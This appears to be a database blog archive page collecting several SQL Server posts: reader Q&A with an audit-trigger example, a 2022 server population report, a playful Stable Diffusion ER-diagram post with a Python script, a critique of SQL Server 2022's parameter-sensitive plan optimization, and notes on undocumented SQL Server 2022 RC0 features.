DanishDBA: Hi Brent. My friend is going to implement logging requirements from customers. They want to see who changed a column value, date and old/new value. Is System-versioned Temporal Tables the recommended solution when performance is the main concern? What are your thoughts on this?

If performance is the main concern, only log the specific columns you care about. For example, you probably wouldn’t want to monitor high-velocity columns like QuantityInStock. When you only care about specific columns and specific sources, triggers are likely to be faster, and generate less transaction log activity.
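As a sketch of that trigger approach – every table and column name here is hypothetical, and you’d want to test log growth under your own workload:

```sql
/* Audit log for just the one column we care about */
CREATE TABLE dbo.PriceAudit
(
    AuditId   BIGINT IDENTITY PRIMARY KEY,
    ProductId INT,
    OldPrice  MONEY,
    NewPrice  MONEY,
    ChangedAt DATETIME2 DEFAULT SYSDATETIME(),
    ChangedBy SYSNAME   DEFAULT SUSER_SNAME()
);
GO
CREATE TRIGGER dbo.Products_PriceAudit
ON dbo.Products
AFTER UPDATE
AS
/* Only write a row when the watched column actually changed */
INSERT dbo.PriceAudit (ProductId, OldPrice, NewPrice)
SELECT d.ProductId, d.Price, i.Price
FROM deleted d
JOIN inserted i ON d.ProductId = i.ProductId
WHERE d.Price <> i.Price;
GO
```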

Skrillex: How do you verify that it’s safe to upgrade DB compat mode to latest version? 2014 to 2019 in this case.

Read this.

Urquan: What percent of your clients license SQL by the server / core vs Microsoft Assurance?


I don’t track that. I don’t sell licensing. I don’t even ask clients how they’re licensing it.

Guðmundur: For query perf testing, can you hint DB compat level at the query level vs changing for entire DB?

Read this.

Piotr: What is your opinion of external tables in Azure SQL DB? Do they perform any better than linked servers in on-prem SQL Server?

Never used ’em.

Elijah: Are there workflow orchestrators that you recommend as an alternative for SSIS? SSIS seems to have pain-points around metadata getting out of date, difficulty to review as code, and being difficult to debug for large workflows. However, nothing else seems to work with SQL Agent.

I don’t work with SSIS, so I’d post that on #SQLHelp.

Anatoli: What are the ideal display columns / column order when running sp_whoisactive to triage a server performance fire?

The defaults. Learn to use the defaults so that when you parachute into a server you’ve never seen before, you can work quickly.

Chenjesu: Do you see any interesting SQL alerting mechanisms at your clients other than email?


Bryan Flores: Hello Brend, do you recommend sql server replication in 2019 or 2022, but do you recommend instead of replication

Come on, Ryan, that’s like asking if I recommend hammers. What’s the problem you’re trying to solve? Don’t ask if you should use a tool – describe the problem you’re facing, and then we can pick the right tool, Mr. Flowers.

Yehat: How do SQL DB snapshots compare with SAN snapshots as a potential rollback mechanism for a failed application deployment / update?

Most of the clients I work with have some kind of high availability and disaster recovery mechanism like log shipping, AGs, or SAN replication. You can’t roll back a database snapshot without affecting everything downstream. SAN snapshots have similar problems, but if you’re also using SAN replication for DR, the syncing back & forth is way easier.

The Swedish Chef: How do you project costs for hypothetical Azure SQL Managed instance against hypothetical SQL in Azure VM? Need to figure out who wins a bakeoff and migrate from on-prem.

Start by exactly quantifying your per-server costs to build, manage, and troubleshoot Always On Availability Groups for a single cluster. If you can’t do that, a true cost comparison is hopeless. (Hint: it’s hopeless.)

Anatoli: What is your opinion of the TSQL MERGE statement? Do you have any performance tips when using it?

Read this.

Sajawal: Please don’t say NO. How can we read an execution on Azure Synapse Analytics? Please help us in that world as well.

I’ve never used Synapse Analytics.

Yitzhak: Do SSMS live query stats ever get you over the performance finish line?

Yes, but read this.

Vilhelms: When do you like to use sp_blitzwho vs when do you like to use sp_whoisactive?

I answer that one in this module of my How I Use the First Responder Kit class.

Guðmundur: Which SQL locking model is easier for developers to understand and code? Optimistic or pessimistic locking?


SQL_RAGE: How does referencing a column by an alias versus the column name influence SQL’s decision on which execution plan to use? Seeing SQL use a bad plan for a query using the column name in an ORDER BY, but a good plan when using the column alias.

Odds are, it’s unrelated to the alias, and related to optimization timeouts. I explain those in my Fundamentals of Query Tuning class.

Ramil: Hi Brent! App controls a lot of things like amount of database files-only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 250gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.

I think you fundamentally misunderstand scaling terms. Scaling up vertically refers to adding hardware. Scaling out horizontally refers to adding more servers. In either case, this is pretty far beyond a free Office Hours question – feel free to click Consulting at the top of the screen before you make a multi-million-dollar licensing and hardware architecture plan.

Fyodor: Would you consider blogging a list of your top 10 most watched Ozar You Tube videos?

No, because people who aren’t smart enough to go to my YouTube channel, click Videos, and click Sort By aren’t smart enough to hold down database jobs anyway.

Who’s Hiring in the Database Community? September 2022 Edition

Who's Hiring

Is your company hiring for a database position as of September 2022? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • Include an email address for resumes, or a link to the application process. If I were you, I’d use an email address – you’ll want to know which applicants are readers here, since they may be more qualified than the applicants you regularly get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.

[Video] Fragmentation Explained in 20 Minutes at SQLBits

Index Maintenance, Videos

What does fragmentation mean? How does it happen? Can you fix it with fill factor? Should you rebuild your indexes to fix it?

At the SQLBits conference, I tried a new way of explaining it using markers and pieces of whiteboard paper as database pages, and doing inserts live on the fly.

What you see onscreen is actually what the in-person audience saw up on the projector. Prior to the session, I rigged up a tripod and camera aimed down at the desk so the audience could watch me work.

I had so much fun with this session, and I’m so proud of the results. I want to thank SQLBits for recording the sessions and making them freely available on YouTube, and the sponsors for making it possible!

SQL ConstantCare® Population Report: Summer 2022

Ever wonder how fast people are adopting new versions of SQL Server, or what’s “normal” out there for SQL Server adoption rates, hardware sizes, or numbers of databases? Let’s find out in the summer 2022 version of our SQL ConstantCare® population report.

Out of the 3,151 servers sending in data recently, the most popular version of SQL Server is still 2016:

This will be the last version of the report where I’ll break out 2008, 2008 R2, and 2012 separately. Going forward, I’ll just lump ’em under “2012 & Prior” since they’ll add up to even less the next time I do the report.

Mainstream support is over for SQL Server 2014 & 2016, so here’s a number that makes me a little nervous: only 55% of servers are under mainstream support. When SQL Server 2017’s mainstream support ends on October 22, that means only the 23% of users on SQL Server 2019, and the 13% in Azure SQL DB, will be getting regular updates. Yowza.

SQL Server 2016, 2017, and 2019 account for 69% of the user population.

Up in the cloud, Azure SQL DB jumped dramatically from 1% overall to about 13%, with 11% of that being Azure SQL DB itself, and Managed Instances at 2% of the population.

The newer products are at the top of this chart, and the new data’s at the right, so you can see the new stuff gradually pushing down the old stuff over time:

While the most popular version is still SQL Server 2016, this year 2019 is getting a lot closer. Every single version’s going down except SQL Server 2019 and Azure SQL DB.

These numbers help to give me perspective when I think about new adoptions of SQL Server 2022. It’s possible that SQL Server 2022 will gain adoption faster than 2019 did because I don’t think there were a whole lot of “I absolutely gotta have that” features in 2019. With 2022’s Availability Groups being able to fail back & forth to the cloud, if that ships in a solid, reliable, easy-to-troubleshoot way, that could be the killer feature that really spurs 2022 adoption.

Drawing Entity Relationship Diagrams with Stable Diffusion


Documenting your database and code is such a pain in the rear. Wouldn’t it be awesome if artificial intelligence could help?

Good news! There are a bunch of AI systems like Stable Diffusion and DALL-E that will draw things based on your text prompts. Forget the slow, tedious task of sketching out the relationships between your tables, and let the machines do the hard work for you.

For example, give this prompt to Stable Diffusion: entity relationship diagram, database, microsoft, sql server, table, unreal engine, ultra realistic

In the interest of speed, I’m only generating 512×512 pixel images, but… I tell you what, if I wanted to pull a joke on a project manager, it’d be pretty funny to generate a whole folder of high-resolution ones, print them out, and gesture at them as I quickly flip through the pages, saying, “We’ve done a spectacular amount of work documenting our database, the application, and its process flows.”

That’s all well and good, but … I think we can do better.

Thomas Kinkade’s Database Diagrams

Why not turn our database diagrams into something our parents would be proud to frame and hang on their walls? I mean, the Painter of Light is not my thing, but he brings a certain something to our databases.

prompt: entity relationship diagram!!!, database, art by thomas kinkade

He really brings our documentation to life. Our databases and apps are often a lot like trees – insert dead wood joke here, ha ha ho ho.

What if your style is a little more tech modern? I got you, fam.

Anime Database Diagrams

prompt: entity relationship diagram!!, database, art by greg rutkowski and wlop and artgerm

Right? RIGHT?!? That is bad ass. Now THAT is the kind of database documentation I actually wanna read. I want that on a poster in my office. I want that as a poster in my BEDROOM.

But sometimes, you’re working with an application that’s a little more… creative.

Salvador Dali’s Database Diagrams

Ever wonder how the surrealist painter would diagram out the relationships between his tables? Me too. I think about it all the time. It’s time to answer that vital question.

Prompt I used: entity relationship diagram, database, salvador dali, surreal


I hereby call on ERStudio to add a Salvador Dali filter. This is what the world needs today.

Too much for you? Want to ease things up a little?

Super Mario’s Entity Relationship Diagrams

I used a variety of prompts for these – it took a lot of experimentation because Stable Diffusion kept trying to just show Mario on top of diagrams, which wasn’t really what I wanted:

I think… that last one is a representation of Super Mario as … a database architect? That’s wonderful, and it sent me down another rabbit hole:

Prompt: super mario holding an entity relationship diagram printout in his hand

This is a wonderful fantasy world – however, let’s get back to today. Let’s find out more about the kinds of folks who have to work with this documentation.

Database administrator at work

Prompt I used: database administrator at work in the office, unreal engine, ultra realistic


Oof: welcome to biased artificial intelligence. If the model is trained on images and data that are mostly white males, and if you’re not specific about the subject of the art, then guess what kind of output you’re going to get? All white males with facial hair.

If you specifically *ask* for diversity, you can get it, but it’s up to you to do that. For example, if you prefix that prompt with “minority female”, then you get:

But again, if you want more diversity than that, you have to be more specific and ask for things like specific races. <sigh> Bias in artificial intelligence is a big issue, something scientists will be working on for years to come. I just feel like I can’t talk about AI-generated images without at least mentioning that topic.

How to generate images yourself


There are a bunch of cloud-based AI illustration tools like DALL-E, but most of them cost money or limit you to a certain number of attempts per day. I say “attempts” because a lot of times, when you put in a prompt, you’re not going to get an image you’re happy with. For example, if you just prompt “database administrator”, you get racks of servers in a data center.

It’s going to take a lot of attempts to get the kind of output you’re looking for. Therefore, I wanted to run it locally on my own laptop to get unlimited attempts with quick turnarounds.

Here’s what I used:

  • NVidia graphics card with at least 6GB of video RAM – I’m using my gaming laptop, an Asus Zephyrus with an RTX 3060 and 6GB of VRAM. 512×512 pixel images generate in about 20 seconds.
  • Stable Diffusion GRisk GUI 0.1 – free Windows app based on the open source Stable Diffusion, but requires no knowledge of how any of this stuff works. It just works, out of the box. 3GB download, requires about 7GB of drive space. Danger: this GUI is a closed source app from a stranger, with no verifiable way to reproduce it, which means it could be doing anything, like installing malware or mining Bitcoin. If you’re willing to roll up your sleeves, there are safer but more complex ways to run it.
  • Stable Diffusion prompting cheatsheet – if you just put in “database administrator”, you get garbage. You need to be as descriptive as possible, and that’s where prompt engineering comes in. For much more detail, check out the Stable Diffusion Akashic Records.
  • – examples of generated art, AND – here’s the important part – the prompts that created them. (The prompts are on the left – that’s not immediately obvious.)
  • /r/StableDiffusion – extremely active SubReddit.

I played around with Stable Diffusion a lot this weekend, and it’s incredibly addictive. The biggest problem by far is that you’re going to have an idea, put that prompt in, and say to yourself, “Well, that’s interesting… but if I just change a few keywords, I can make it way better.” And then next thing you know, an hour has gone by.

Here’s how my workflow goes:

  • Start with a set of keywords, and generate a bunch of images (like say 10 or 50.)
  • Find the ones you like, and note their seed numbers. Normally, Stable Diffusion takes -1 as a seed, which means generate a random seed. However, if you pass a specific seed number in again, but tweak your keywords the second time around, you can modify that image. For example, you can change the art style, or refine the keywords to make that image better represent what you’re looking for.
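If you’d rather script that workflow than click through a GUI, here’s a rough sketch using the Hugging Face diffusers library – the model name and prompt are just examples, and this assumes a CUDA GPU with enough VRAM:

```python
import random

import torch
from diffusers import StableDiffusionPipeline

# Load the model once (a several-GB download on first run)
pipe = StableDiffusionPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5", torch_dtype=torch.float16
).to("cuda")

prompt = "entity relationship diagram, database, art by thomas kinkade"

# Step 1: generate a batch of images, remembering each seed
seeds = [random.randrange(2**32) for _ in range(10)]
for seed in seeds:
    generator = torch.Generator("cuda").manual_seed(seed)
    image = pipe(prompt, generator=generator, height=512, width=512).images[0]
    image.save(f"erd_{seed}.png")

# Step 2: once you find a keeper, reuse its exact seed while tweaking the
# keywords -- same seed plus new keywords produces a variation on that image
best_seed = seeds[0]  # pretend this one looked good
generator = torch.Generator("cuda").manual_seed(best_seed)
image = pipe(prompt + ", surreal, salvador dali",
             generator=generator, height=512, width=512).images[0]
image.save(f"erd_{best_seed}_dali.png")
```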

Happy playing! Did I say playing? I meant documenting. Yeah. You’re doing important research.

PSPO: How SQL Server 2022 Tries to Fix Parameter Sniffing

Parameter sniffing is a notorious problem for Microsoft SQL Server because it tries to reuse execution plans, which doesn’t work out well for widely varying parameters. Here’s a primer for the basics about how it happens.

SQL Server 2022 introduces a new feature called Parameter Sensitive Plan optimization. I’m not really sure why Microsoft capitalized the first three letters sometimes and not others, or why they only abbreviate it as “PSP optimization” – as long as we’re abbreviating, why not call it PSPO? Optimization is the word in there with the most syllables – why the hell would we leave that one as the one that isn’t abbreviated?

Because I make things go faster for a living, we’re gonna call it PSPO. You’ll see how I pronounce it later, and why.

We’ll pick up from that primer blog post, but this time around we’ll put the database in SQL Server 2022 compatibility mode, which enables PSPO.

When I run it for @Reputation = 2, hardly any users match:

The actual execution plan has some new stuff in SQL Server 2022:

Up near the top of that screenshot, if you look closely at the query, the query itself has been modified. SQL Server has added an “option” hint. Here’s the full text of the modified query:

Let’s dig into how this works.

What OPTION (PLAN PER VALUE) means

When SQL Server compiled the query plan for the first time, it noticed that we were doing an equality search on the Users.Reputation column, and that different values for that parameter might produce dramatically different numbers of rows. That explains the “predicate_range” part.

SQL Server realized:

  • Some parameters might produce fewer than 100 rows
  • Some might produce 100 to 1,000,000 rows
  • Some might produce over 1,000,000 rows

So SQL Server will build a small, medium, and large query plan for this one query, using different plans depending on the parameter that gets passed in. That’s pretty spiffy because the plan isn’t hard-coding specific parameter values – instead, each time the plan gets executed, SQL Server will look up that parameter in the statistics histogram and choose the small, medium, or large plan based on the value it guesses from the histogram.
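The injected hint ends up looking something like this – a sketch, not the exact text, with the row boundaries taken from the thresholds above and a simplified version of the demo query:

```sql
SELECT *
FROM dbo.Users
WHERE Reputation = @Reputation
OPTION (PLAN PER VALUE(QueryVariantID = 2,
    predicate_range([dbo].[Users].[Reputation] = @Reputation, 100.0, 1000000.0)));
```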

To see what goes into the plan cache, let’s clear the cache, run the query, and then check the plan cache’s contents with sp_BlitzCache:
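That sequence looks roughly like this – the stored procedure name is hypothetical, standing in for the demo proc:

```sql
DBCC FREEPROCCACHE;   /* dev/test only: wipes the whole plan cache */
GO
/* Hypothetical proc name standing in for the demo's stored procedure */
EXEC dbo.usp_UsersByReputation @Reputation = 2;
GO
EXEC dbo.sp_BlitzCache;
```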

sp_BlitzCache shows that the outer stored procedure has been executed one time, and the inner statement has been executed once:

That’s kinda slick because it means SQL Server only put the medium-sized plan into cache. It didn’t build the small or large plan because it didn’t need to yet – those haven’t been executed yet, and they might never be executed.

Let’s execute the large data version, Reputation = 1. That produces a ton of rows because everybody gets 1 point when they first open their account:

The actual plan is a parallel table scan:

And SQL Server rewrote the query text to include a different QueryVariantID:

And the plan cache shows that the outer proc has been executed twice, with both the medium and large query being executed once each:

If you only read this far, and only do a short demo like that, it seems like Microsoft made huge leaps in solving the parameter sniffing issue. PSPO enables us to cache up to 3 execution plans per query – a small, medium, and large plan – and chooses between them at runtime. That’s how it’s going to look from conference stages as Microsoft brags about the effectiveness of this feature.

But let’s dig just a little bit deeper, and there are small, medium, and large problems.

Small problem: we still have sniffing.

Try running it for, say, Reputation = 3 and review the actual query plan:

Reputation = 3 reuses the query plan we built for Reputation = 2 – scroll up to the earlier screenshots if you wanna double-check my work. Note that SQL Server only estimated that it’d find 9,149 rows – that’s because the medium plan sniffed the first value it was called with, Reputation = 2.

Reputation = 3 brings back 21x more rows than Reputation = 2 did, so it reads more logical pages than there are in the table, only goes single-threaded, and the sort spills to TempDB.

If we free the plan cache, and then run it for Reputation = 3 first:

Then the “medium” plan is built with a parallel scan plan with a big memory grant, which works beautifully for Reputation = 3. However, it doesn’t work as well for Reputation = 2:

Which leaves that giant memory grant on the floor and generates a ton of CX% waits because the estimate is now 21x off in the other direction.

SQL Server 2022’s PSPO implementation doesn’t fix parameter sniffing – it amplifies the problem, because now we have more possible execution plans in memory, each of which gets sniffed. In most scenarios, I think this is still going to be a net win, because the small and large plans will likely be way less vulnerable to extreme performance emergencies. The medium plans will still be just as vulnerable.

Medium problem: direct equality searches only.

The PSPO implementation is more of a down payment than a full payment. It only works for equality searches, not range searches. One of the most common parameter sniffing problems is the date range issue: queries with start & end date parameters, like this.

PSPO doesn’t add the option hint to the query here:

Because PSPO is coded for direct equality searches only.

By direct, I mean direct comparisons to a column with known huge variances in cardinality. For an example of an indirect search, let’s take a table that has a lookup table: the Posts and PostTypes tables. Stack Overflow stores all kinds of things in the Posts table, and they’re identified by their PostTypeId:

Questions and Answers are by far the most popular PostTypes:

So given that I’ve got an index on PostTypeId, which means we also have statistics on PostTypeId, this query could get different plans for different parameters:

Sadly, it does not, because PSPO doesn’t trigger here either – note that PSPO didn’t add an option hint on the query:

Note the wiiiiildly incorrect estimates on the number of Posts that will match. SQL Server’s using the density vector there, optimizing for the average PostTypeId rather than any specific one. PSPO won’t go so far as to:

  1. Fetch the PostTypeId for ‘PrivilegeWiki’, then
  2. Look up that PostTypeId in the statistics on the Posts table, then
  3. Notice that there’s a large skew by PostTypeId, and build different plans

Nope – that’s too much work for the PSPO implementation, at least in v2022.

Large problem: monitoring software is doomed.

If you look closely at the sp_BlitzCache screenshots, there’s a huge, massive, giant, unbelievably big new problem:

In the “Query Type” column, the two PSPO-generated queries just say “Statement.” When you’re looking at queries and plans – whether you’re looking at the plan cache, or sp_WhoIsActive, or your monitoring tools, or Query Store as Erik Darling demos – SQL Server can no longer tell where the query came from. It’s like every running statement is suddenly dynamic SQL with no parent.

For example, if you look at the query plan for a stored procedure that’s been “optimized” by PSPO, you get:

If you think that’s bad, there’s no way to join to the underlying statements. That’s not just bad, it’s poor. Really, really poor.

Going into SQL Server 2022 compatibility level simply breaks query performance monitoring.


When the first previews of 2022 dropped, I played around with this feature and thought, “There is absolutely no way they’d ship something this broken.” I just kinda shrugged and moved on. But now, today, it’s heartbreaking to think this is the way the feature’s going to ship.

That’s PSPO.

Pronounced pss-poh, as in piss-poor.

I love the idea of parameter-sensitive plan optimization. It’s a great idea. Done correctly, this would make database apps go faster and reduce the troubleshooting involved when they’re having performance issues.

But this, this is just a PSPO implementation.

What’s New in SQL Server 2022 Release Candidate 0: Undocumented Stuff

SQL Server 2022

Microsoft has an official list of what’s new in 2022 overall, but here I’m specifically focusing on system objects that might be interesting to script developers like you and me, dear reader.

New stored procedure sp_get_table_card_est_and_avg_col_len – I assume the “card” refers to statistics and cardinality, not Hallmark. SQL Server has historically struggled with memory grants because it uses datatype size to budget memory grants, and bigger-than-necessary data types (like NVARCHAR(MAX)) have led to larger-than-necessary grants. It’d be cool if this proc was a down payment to mitigate that problem, but I have a sinking feeling it has to do with external data sources. I would tell you more about it, but when I run it, I get:

New view sys.dm_tran_orphaned_distributed_transactions – every now and then, I’ve run across Availability Groups replicas with problems due to orphaned distributed transactions consuming DTC resources or holding locks. This new undocumented DMV might be a down payment to resolve that problem. I don’t have an easy way to reproduce the problem quickly, so I can’t demo it.

New view sys.database_automatic_tuning_configurations – this one’s a little odd because Books Online tells me it’s been around since SQL Server 2017, but I don’t remember seeing it before, and it’s not in my 2019 test instances. It tells you if Force_Last_Good_Plan is on, and I would imagine that as more automatic tuning options come out over the next several releases, this view will pick up more info.

New Query Store DMV columns – now that Query Store is starting to work on read-only replicas, it looks like they added plan_persist_plan_feedback.replica_group_id and plan_persist_query_hints.replica_group_id to support those goals. Plus, plan_persist_plan_forcing_locations gets columns for timestamp and plan_forcing_flags.

New spinlock troubleshooting – sys.dm_os_workers gets columns for spinlock_wait_time_ms, spinlock_max_wait_time_ms, and spinlock_wait_count.
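If you want to eyeball those, here’s a quick sketch – the column names are what shipped in RC0 and may change before RTM:

```sql
/* Workers that have burned the most time waiting on spinlocks.
   Column names are as shipped in RC0 and may change before RTM. */
SELECT TOP 10
       w.spinlock_wait_time_ms,
       w.spinlock_max_wait_time_ms,
       w.spinlock_wait_count,
       w.state,
       w.last_wait_type
FROM sys.dm_os_workers AS w
ORDER BY w.spinlock_wait_time_ms DESC;
```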

New stuff to support offloaded compression

This stuff needs its own section. RC0 introduced the ability to offload compression to Intel processors equipped with QuickAssist.

We get new sp_configure options for ‘hardware offload mode’ and ‘backup compression algorithm’. By default, these are off. To turn on offloaded compression, install the Intel QAT drivers, then do an alter:
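Roughly like this – I’m sketching the syntax the shipping documentation settled on, so the exact RC0 shape may differ a little:

```sql
/* A sketch of turning on QAT offload. The sp_configure option name
   here is the RC0 one mentioned above; later builds may rename it. */
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'hardware offload mode', 1;
RECONFIGURE;

/* Then tell SQL Server which accelerator to use: */
ALTER SERVER CONFIGURATION
    SET HARDWARE_OFFLOAD = ON (ACCELERATOR = QAT);
```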

Which returns:

After restarting the SQL Server, check this brand spankin’ new DMV:
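In the shipped product, the QAT status DMV is sys.dm_server_accelerator_status – I’m assuming that’s the same one RC0 introduced:

```sql
/* Check whether offload actually lit up. Assuming RC0's DMV matches
   the one that shipped, sys.dm_server_accelerator_status: */
SELECT accelerator_desc,
       mode_desc,
       mode_reason_desc
FROM sys.dm_server_accelerator_status;
```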

And, uh, on my VM, it’s still not enabled:

That’s because you can enable it even on processors that don’t support it, which strikes me as kinda odd. I suppose you’d want to make it part of your standard build, and then whenever the hardware is available, it’ll get used – assuming you call for offloaded backup compression in the right way.
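“The right way” being, per the shipping docs, asking for the QAT algorithm explicitly in the backup command – it falls back to software mode when no QAT hardware is present. The database name and path here are just examples:

```sql
/* Ask for QAT compression explicitly. Per the shipping documentation,
   this falls back to software mode if no QAT hardware is present.
   Database name and path are just examples. */
BACKUP DATABASE StackOverflow
    TO DISK = 'D:\Backups\StackOverflow.bak'
    WITH COMPRESSION (ALGORITHM = QAT_DEFLATE);
```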

New messages in RC0

In each release, I check sys.messages for new stuff. Some of it gets added for the cloud, like Azure SQL DB or Managed Instances, so take these with a grain of salt. Here’s what’s new in RC0 since the last CTP:

  • 1136: The tempdb has reached its storage service limit. The storage usage of the tempdb on the current tier cannot exceed (%d) MBs.
  • 5373: All the input parameters should be of the same type. Supported types are tinyint, smallint, int, bigint, decimal and numeric.
  • 5374: WITH clause is not supported for locations with ‘%ls’ connector when specified FORMAT is ‘%ls’.
  • 16722: Cannot change service objective for %ls to %ls as long-term retention is not supported yet on Hyperscale. Please disable long-term retention on the database and retry
  • 17414: Retrieving the address of an exported function %.*ls in accelerator library %.*ls failed with error 0x%x.
  • 17415: %.*ls component enumeration failed with zero component count.
  • 17416: %.*ls component enumeration failed with mismatch in component count.
  • 17417: %.*ls %.*ls not compatible with SQL Server.
  • 17418: Detected %.*ls %.*ls.
  • 17419: %.*ls hardware detected on the system.
  • 17420: %.*ls hardware not found on the system.
  • 17431: %.*ls initialization failed with error %d.
  • 17432: %.*ls initialization succeeded.
  • 17433: %.*ls session creation failed with error %d.
  • 17434: %.*ls session sucessfully created.
  • 17435: %.*ls will be used in hardware mode.
  • 17436: This edition of SQL Server supports only software mode. %.*ls will be used in software mode.
  • 17437: %.*ls will be used in software mode.
  • 17438: %.*ls session alive check failed with error %d.
  • 17439: %.*ls session tear down failed with error %d.
  • 17440: %.*ls session close failed with error %d.
  • 17441: This operation requires %.*ls libraries to be loaded.
  • 19713: Statistics on virtual column are not avalable.
  • 19714: Number of columns in PARTITION clause does not match number of partition columns in Delta schema.
  • 21093: Only members of the sysadmin fixed server role or db_owner fixed database role or user with control db permission can perform this operation. Contact an administrator with sufficient permissions to perform this operation.
  • 22786: Synapse workspace FQDN is not in the list of Outbound Firewall Rules on the server. Please add this to the list of Outbound Firewall Rules on your server and retry the operation.
  • 22787: Change feed table group limit of %d groups exceeded
  • 22788: Could not enable Change Feed for database ‘%s’. Change Feed can not be enabled on a DB with delayed durability set.
  • 25755: Could not create live session target because live session targets are disabled.
  • 31633: The length of the provided %ls exceeds the maximum allowed length of %u bytes.
  • 31634: The %ls must contain a ‘%ls’ for use with managed identity.
  • 31635: The %ls’s ‘%ls’ value must be a %ls for use with managed identity.
  • 31636: Error retrieving the managed identity access token for the resource id ‘%ls’
  • 33547: Enclave comparator cache failed to initialize during enclave load.
  • 39057: The value provided for the ‘%.*ls’ parameter is too large.
  • 39058: The parameter ‘%.*ls’ has a type that is not supported.
  • 45770: Failed to move the database into elastic pool due to internal resource constraints. This may be a transient condition, please retry.
  • 46552: Writing into an external table is disabled. See ‘’ for more information.
  • 46553: Create External Table as Select is disabled. See sp_configure ‘allow polybase export’ option to enable.
  • 46953: Pass through authorization using S3 temporary credentials is not supported. Please use S3 credentials to access storage.
  • 47507: Adding memory optimized files to the database replicated to Azure SQL Managed Instance is not supported because its service tier does not support In-memory OLTP capabilities. Consider replicating database to managed instance service tier supporting In-memory OLTP capabilities.
  • 47508: Adding multiple log files to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support multiple log files.
  • 47509: Adding FileStream or FileTables to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support FileStream or FileTables.
  • 47510: Adding multiple memory optimized files to the database replicated to Azure SQL Managed Instance is not supported because managed instance does not support multiple memory optimized files.

If any of those messages are interesting to you, feel free to leave a comment about it.

New database-scoped configuration options

These are all new since SQL Server 2019 – some were introduced in prior CTPs, but I’m mentioning them all here because there’s good stuff in them for query tuners:

  • 31 – CE_FEEDBACK

That last one’s particularly interesting to me because SQL Server 2019 originally shipped in a way that let you see runtime parameters in sys.dm_exec_query_statistics_xml, and then they turned it off around CU11-12 without documenting the changed behavior. That was a total bummer, because that feature was a lifesaver for troubleshooting parameter sniffing. I’m hoping we can get it back.
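If you want to experiment, these toggle like any other database-scoped configuration – here’s a sketch using CE_FEEDBACK from the list above:

```sql
/* Database-scoped configurations toggle per-database.
   CE_FEEDBACK is the one called out in the list above. */
ALTER DATABASE SCOPED CONFIGURATION SET CE_FEEDBACK = ON;

/* And you can see what's set where: */
SELECT configuration_id, name, value
FROM sys.database_scoped_configurations
WHERE name = 'CE_FEEDBACK';
```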